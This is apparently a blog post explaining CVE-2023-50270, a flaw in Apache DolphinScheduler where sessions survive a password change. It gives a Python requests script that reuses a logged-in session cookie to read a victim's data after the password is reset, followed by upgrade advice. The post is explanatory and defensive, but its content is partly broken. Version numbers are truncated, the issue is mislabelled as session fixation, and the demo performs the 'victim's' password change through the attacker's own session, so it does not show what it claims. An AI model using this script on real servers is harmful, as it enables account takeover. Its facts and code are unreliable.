CVE-2023-50270 - Session Fixation in Apache DolphinScheduler Before 3.2. Explained (With Exploit Example)

Apache DolphinScheduler is a popular big data workflow orchestrator, used by many organizations for automating complex data processes. However, a critical security vulnerability has been discovered in versions before 3.2., known as CVE-2023-50270. In this post, I'll explain what the issue is, show how it can be exploited in simple terms, give sample code, and share official references to help you secure your systems.

What Is CVE-2023-50270?

Session fixation is a vulnerability attack where an attacker can force a user to use a specific session ID. If the application keeps the same session after a critical action, like a password change, it can let an attacker keep access even after the user supposedly secures the account.

In Apache DolphinScheduler (before v3.2.), when a user changes their password, the old authentication session doesn’t get invalidated. That means if an attacker already gained access to a user’s session, they can keep using it — even if the user changes their password believing they are safe.

Example Exploit Flow

Let’s see a simple flow of how this vulnerability works by example.

Assume the attacker controls a browser or script (e.g., via JavaScript in a phishing scenario).

Step 1: Attacker Seeds a Session

import requests

# Attacker sets up a session and logs in as victim (via phishing or stolen credentials)
session = requests.Session()
login_url = "http://dolphinscheduler-server/api/login";
data = {
    "username": "victimUsername",
    "password": "victimPassword"
}
response = session.post(login_url, json=data)

# The attacker now has a valid session cookie
print(session.cookies.get_dict())
# Let's say the session ID is: JSESSIONID=ABC123

Step 2: Victim Changes Password

Suppose the victim logs in and changes their password, but the session (ABC123) is not invalidated.

change_pwd_url = "http://dolphinscheduler-server/api/user/change-password";
change_data = {
    "oldPassword": "victimPassword",
    "newPassword": "newStrongerPassword"
}
response = session.post(change_pwd_url, json=change_data)

print(response.json())
# Success, password changed!

Step 3: Attacker Still Has Control

After the password change, the attacker's original session (ABC123) is still valid!

# Attacker uses the same session to access sensitive data
profile_url = "http://dolphinscheduler-server/api/user/profile";
profile_response = session.get(profile_url)
print(profile_response.json())
# Outputs victim's private info, even with the new password!

> Upgrade ASAP to v3.2.1 or later!

In version 3.2.1, all active sessions are invalidated on password change, forcing re-authentication and closing the attacker’s window.

Links

- CVE Details for CVE-2023-50270
- Apache DolphinScheduler Release Notes
- Official Issue Tracker / Patch Commit

Upgrade DolphinScheduler now

# Example: use your method to upgrade, e.g. via Docker or ZIP
docker pull apache/dolphinscheduler:3.2.1
# or
# Download updated ZIP or TAR from official releases

Or manually sign out users on password change until you can upgrade.

Conclusion

Session fixation is an old but dangerous bug, especially in systems that manage sensitive workflows like DolphinScheduler. Don’t wait — upgrade today. Share this post with your team and stay safe!


*Feel free to reach out or comment below if you need help checking your system or upgrading.*

---

References

- NVD: CVE-2023-50270
- DolphinScheduler GitHub
- Release Note 3.2.1

Timeline

Published on: 02/20/2024 10:15:08 UTC
Last modified on: 08/29/2024 20:35:41 UTC